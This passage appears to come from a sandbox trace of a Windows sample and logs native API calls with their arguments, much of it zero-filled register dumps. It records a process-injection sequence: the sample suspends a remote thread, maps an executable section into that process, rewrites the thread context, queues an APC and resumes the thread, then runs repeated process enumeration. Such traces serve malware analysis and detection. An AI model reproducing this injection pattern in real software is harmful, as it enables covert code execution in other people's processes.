Attributes=0x80, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), InitialOwner=0 | out: MutantHandle=0x14e2e0*=0xc0) returned 0x0 [0084.946] NtClose (Handle=0xbc) returned 0x0 [0084.949] NtOpenProcess (in: ProcessHandle=0x14e644, DesiredAccess=0x438, ObjectAttributes=0x14e60c*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x14e624*(UniqueProcess=0x45c, UniqueThread=0x0) | out: ProcessHandle=0x14e644*=0xbc) returned 0x0 [0084.949] NtQueryInformationProcess (in: ProcessHandle=0xbc, ProcessInformationClass=0x1a, ProcessInformation=0x14e634, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x14e634, ReturnLength=0x0) returned 0x0 [0084.949] NtMapViewOfSection (in: SectionHandle=0xac, ProcessHandle=0xbc, BaseAddress=0x14e630*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x14e62c*=0x1b58000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x14e630*=0x7f30000, SectionOffset=0x0, ViewSize=0x14e62c*=0x1b58000) returned 0x0 [0084.951] NtClose (Handle=0xbc) returned 0x0 [0084.953] NtDelayExecution (Alertable=0, Interval=0x14e28c*=-50000000) returned 0x0 [0093.019] NtOpenProcess (in: ProcessHandle=0x14e248, DesiredAccess=0x438, ObjectAttributes=0x14d7f8*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x14d838*(UniqueProcess=0x45c, UniqueThread=0x0) | out: ProcessHandle=0x14e248*=0xf0) returned 0x0 [0093.025] NtQueryInformationProcess (in: ProcessHandle=0xf0, ProcessInformationClass=0x0, ProcessInformation=0x14d848, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x14d848, ReturnLength=0x0) returned 0x0 [0093.033] NtOpenThread (in: ThreadHandle=0x14d7f0, DesiredAccess=0x1a, ObjectAttributes=0x14d7f8, ClientId=0x14d828*(UniqueProcess=0x0, UniqueThread=0x460) | out: ThreadHandle=0x14d7f0*=0xec) returned 0x0 [0093.038] NtSuspendThread (in: ThreadHandle=0xec, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0093.047] NtGetContextThread (in: ThreadHandle=0xec, Context=0x14dd40 | out: Context=0x14dd40*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x1, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x3a, [73]=0x93, [74]=0x5f, [75]=0x77, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x24c0cc0, SegEs=0x0, SegDs=0x12f5e8, Edi=0x0, Esi=0x100ee, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x12f5e8, SegCs=0x0, EFlags=0x100ee, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x46, [5]=0x2, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x1, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x4, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x3a, [45]=0x93, [46]=0x5f, [47]=0x77, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0093.060] NtCreateSection (in: SectionHandle=0x14d7d0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x14d770, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x14d7d0*=0xf4) returned 0x0 [0093.063] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xf0, BaseAddress=0x14d7d8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x14d778*=0x10a646, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x14d7d8*=0x7940000, SectionOffset=0x0, ViewSize=0x14d778*=0x10b000) returned 0x0 [0093.074] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xffffffffffffffff, BaseAddress=0x14d7c8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x14d778*=0x10b000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x14d7c8*=0x4210000, SectionOffset=0x0, ViewSize=0x14d778*=0x10b000) returned 0x0 [0093.125] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x4210000) returned 0x0 [0093.167] NtClose (Handle=0xf4) returned 0x0 [0093.171] NtSetContextThread (ThreadHandle=0xec, Context=0x14dd40*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x1, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x3a, [73]=0x93, [74]=0x5f, [75]=0x77, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x24c0cc0, SegEs=0x0, SegDs=0x12f5e8, Edi=0x0, Esi=0x100ee, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x12f5e8, SegCs=0x0, EFlags=0x100ee, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x46, [5]=0x2, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x1, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x4, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0xe5, [45]=0x58, [46]=0x9c, [47]=0x7, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0093.171] NtQueueApcThread (ThreadHandle=0xec, ApcRoutine=0x79c58f2, NormalContext=0x0, SystemArgument1=0x0, SystemArgument2=0x0) returned 0x0 [0093.175] NtResumeThread (in: ThreadHandle=0xec, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0093.175] NtClose (Handle=0xf0) returned 0x0 [0093.175] NtClose (Handle=0xec) returned 0x0 [0093.183] PostThreadMessageW (idThread=0x45c, Msg=0x111, wParam=0x0, lParam=0x0) returned 0 [0093.462] PostThreadMessageW (idThread=0x45c, Msg=0x8003, wParam=0x14e2a9, lParam=0x0) returned 0 [0093.463] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0093.464] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0098.471] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0098.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0098.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0098.474] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0098.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0098.477] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0098.478] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0103.584] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0103.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0103.585] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0103.586] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0103.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0103.589] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0103.589] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0108.748] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0108.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0108.749] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0108.749] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0108.749] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0108.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0108.752] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0108.764] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0108.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: 